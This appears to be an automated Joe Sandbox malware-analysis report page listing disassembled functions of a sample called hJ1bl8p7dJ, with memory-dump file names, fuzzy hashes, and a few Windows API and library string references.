                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 236b175780d7f46bd25b512d32050df8cf8b6fd8cc245099ec62e5302b5945cc
                                                                                                                                                                                      • Instruction ID: af451b89793d9622625a64b9ae491a5529268e4fc42b5e845f09e2362fffc820
                                                                                                                                                                                      • Opcode Fuzzy Hash: 236b175780d7f46bd25b512d32050df8cf8b6fd8cc245099ec62e5302b5945cc
                                                                                                                                                                                      • Instruction Fuzzy Hash: CCB1BD32A0878286EB649B11E95477A73E1FB49790F034136DACD43BA5DFB9E8D0D702
                                                                                                                                                                                      Function 00007FFEEE108BF0 Relevance: .3, Instructions: 253COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 2b8bac832d0c650086b4dc42c53d8ace14853648eeee84f5419066bf6c47015c
                                                                                                                                                                                      • Instruction ID: af7216ee1b0f8f7f0d104f081c555b45a1a4d313eaf272c0e98bfaf3e42713af
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b8bac832d0c650086b4dc42c53d8ace14853648eeee84f5419066bf6c47015c
                                                                                                                                                                                      • Instruction Fuzzy Hash: DB91542270C5D10DDB0D4F7DE8A017D3EF1AA8EA19319416EE6CBEA657D43EC682C701
                                                                                                                                                                                      Function 00007FFEEE17CF20 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: b28eec96b4380ef9a2f21c612e464b736ee0e67a7e4dedad1db971d69b90961c
                                                                                                                                                                                      • Instruction ID: 876d157899dcc135e30f620af1e93417d91244ee701a4e90e5004d127a969b6c
                                                                                                                                                                                      • Opcode Fuzzy Hash: b28eec96b4380ef9a2f21c612e464b736ee0e67a7e4dedad1db971d69b90961c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 11A18E72A0874A86EB24CF25E0447ADB7A4FB4AB84F578436CB8D43665DFBCE485C701
                                                                                                                                                                                      Function 00007FFEEE134B20 Relevance: .2, Instructions: 229COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 071c24b70f5cbd7195dd42993fdc9672807ef3d9a88019fc5a960ffd462a855e
                                                                                                                                                                                      • Instruction ID: e380e81ef206bfe3e095fbf2c028d3a238ead9b655e4ce5d21278ff7edb25bf0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 071c24b70f5cbd7195dd42993fdc9672807ef3d9a88019fc5a960ffd462a855e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 59917E77B246508FE318CFB8D451ADD77B2F788748B419129DF06A7B08DB34AA16CB80
                                                                                                                                                                                      Function 00007FFEEE164CE0 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: c6a89dc18ea4a9d0869e7230d4763db27abee8d8773c002f4b02af570902890e
                                                                                                                                                                                      • Instruction ID: 5bce1be064a0903cec7dc053cbfb96b2ec4d0ca6f3c3e6bc859daeafcaf9566a
                                                                                                                                                                                      • Opcode Fuzzy Hash: c6a89dc18ea4a9d0869e7230d4763db27abee8d8773c002f4b02af570902890e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B81BF32A0868386EB54DF25B4147BD2791FB85B84F075032DA8E47BA6DFBCE481C702
                                                                                                                                                                                      Function 00007FFEEE1BB6B0 Relevance: .2, Instructions: 224COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: b5dbd288d49a495213672b2650cd87f2f45c00111ba0c5e79e6033a279b9f760
                                                                                                                                                                                      • Instruction ID: 56797c372a805593875be019ff6fe92106e1393bc678823017326252f12a0bcd
                                                                                                                                                                                      • Opcode Fuzzy Hash: b5dbd288d49a495213672b2650cd87f2f45c00111ba0c5e79e6033a279b9f760
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D918F62B1868587DB58CF2D910477C77A0F798B44F56A239DB5A83B51FB78EAC0C700
                                                                                                                                                                                      Function 00007FFEEE16C650 Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 0f212ade3e8958b2948aab9627d8d3f87b9a032a6560960e39fd9d3d6f24f1df
                                                                                                                                                                                      • Instruction ID: 29ea31b8f0b66ae722547d4516443f5196d977716adadef75c8962d18c90d895
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f212ade3e8958b2948aab9627d8d3f87b9a032a6560960e39fd9d3d6f24f1df
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D81C072A0968385EB748A1AF14077967A5FB88BC4F0B9036CE8D47766DFB8D8C1C741
                                                                                                                                                                                      Function 00007FFEEE12BE10 Relevance: .2, Instructions: 201COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 18083e57824a17161829f0eedd83e2d6a19884e712728e89765a44399dddd317
                                                                                                                                                                                      • Instruction ID: 73a7407b272a32651983a3811210b2e5a5065427ba15b07a68b234da226f2b95
                                                                                                                                                                                      • Opcode Fuzzy Hash: 18083e57824a17161829f0eedd83e2d6a19884e712728e89765a44399dddd317
                                                                                                                                                                                      • Instruction Fuzzy Hash: F191BF62F08B8582E704CF29950027C73A1FB98B88F169236DF8D47766EF78E9C18340
                                                                                                                                                                                      Function 00007FFEEE12A530 Relevance: .2, Instructions: 194COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 6c33824b5e95a59c1c160466e4c4e8e239db09b6634da41c54f7ff6e6eed5a35
                                                                                                                                                                                      • Instruction ID: 43762a83954846f51cd90ea6c9e9e75f463dab9b7d6cc688eea9b3dacf3e6052
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c33824b5e95a59c1c160466e4c4e8e239db09b6634da41c54f7ff6e6eed5a35
                                                                                                                                                                                      • Instruction Fuzzy Hash: FC81E6B3A056819ADB11CF25E45066DBBA0FB48B80F4BC532DB8E47790EF78D895DB01
                                                                                                                                                                                      Function 00007FFEEE239490 Relevance: .2, Instructions: 184COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 6569a928983bfe19003c39f7ff2eb48886ed0f2940868716b29ec894a7c8a1ff
                                                                                                                                                                                      • Instruction ID: d7a8668b96bb74d9d631983adb9fad391faf7e6980c2ab446b04918dd95d5ac4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6569a928983bfe19003c39f7ff2eb48886ed0f2940868716b29ec894a7c8a1ff
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8961E372A1866286D7208F15E04077A77A0F7DEB84F175132EA8E17768DEBDE941CF01
                                                                                                                                                                                      Function 00007FFEEE173D70 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 16ceb259e3493bf1ec588c8a0c623d746afe974d10b1d82e5808d70a243b2649
                                                                                                                                                                                      • Instruction ID: b56f1a729f001ef6a0cefc020d6cd45ed15d4548ca4fd40949d614be65517040
                                                                                                                                                                                      • Opcode Fuzzy Hash: 16ceb259e3493bf1ec588c8a0c623d746afe974d10b1d82e5808d70a243b2649
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5251091361D3C98AEB50CB5D944036C7AE0E766F84F5E8136EAC8833A2DA7DD956C313
                                                                                                                                                                                      Function 00007FFEEE25B444 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 570795689-0
                                                                                                                                                                                      • Opcode ID: aeb96a2494a04752b5dc3f15f4d6223bcbf2d088cd50240a63637ce0e1d52570
                                                                                                                                                                                      • Instruction ID: c9e3c3501320aa46e807f9d3acf4670ed9611dfda85f1b27178af2b375408d44
                                                                                                                                                                                      • Opcode Fuzzy Hash: aeb96a2494a04752b5dc3f15f4d6223bcbf2d088cd50240a63637ce0e1d52570
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D410D10E0CA4241F9686F317A6137962815FCD7A0F174735E9FE1A6F6FEEDA8098243
                                                                                                                                                                                      Function 00007FFEEE240E90 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 139COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: new[]
                                                                                                                                                                                      • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                      • API String ID: 4059295235-3840279414
                                                                                                                                                                                      • Opcode ID: bb63b660b28564e2b4f56d70e8d4805a2ad26e5cdeba8f4d134ad6f1fd5ea73c
                                                                                                                                                                                      • Instruction ID: 0601aca25de15f9db2f26321e5d3dcad0b115b2e25ccf84d8325cc6d53536cf3
                                                                                                                                                                                      • Opcode Fuzzy Hash: bb63b660b28564e2b4f56d70e8d4805a2ad26e5cdeba8f4d134ad6f1fd5ea73c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 79519451E0C78781FB159F62B411B7A6691AF88B84F474436D9CD0B6B5CEFCE8858303
                                                                                                                                                                                      Function 00007FFEEE258B40 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                                      • Opcode ID: b279a170408d618237bddf6b9ec99c878b24dd9d163caff4e822d6b1485b2f82
                                                                                                                                                                                      • Instruction ID: d843e1f9f5cd4f09e10712d54ce8b0fcefe2034bcba481c1b0ed2011cefdc90a
                                                                                                                                                                                      • Opcode Fuzzy Hash: b279a170408d618237bddf6b9ec99c878b24dd9d163caff4e822d6b1485b2f82
                                                                                                                                                                                      • Instruction Fuzzy Hash: 481142A2E1CE0702F65C1968FF4637911446FDD370E1B0635E6EF866FAAEEC68494107
                                                                                                                                                                                      Function 00007FFEEE25B684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FFEEE259A4F,?,?,00000000,00007FFEEE259CEA,?,?,?,?,00000000,00007FFEEE259C76), ref: 00007FFEEE25B6A3
                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFEEE259A4F,?,?,00000000,00007FFEEE259CEA,?,?,?,?,00000000,00007FFEEE259C76), ref: 00007FFEEE25B6C2
                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFEEE259A4F,?,?,00000000,00007FFEEE259CEA,?,?,?,?,00000000,00007FFEEE259C76), ref: 00007FFEEE25B6EA
                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFEEE259A4F,?,?,00000000,00007FFEEE259CEA,?,?,?,?,00000000,00007FFEEE259C76), ref: 00007FFEEE25B6FB
                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFEEE259A4F,?,?,00000000,00007FFEEE259CEA,?,?,?,?,00000000,00007FFEEE259C76), ref: 00007FFEEE25B70C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
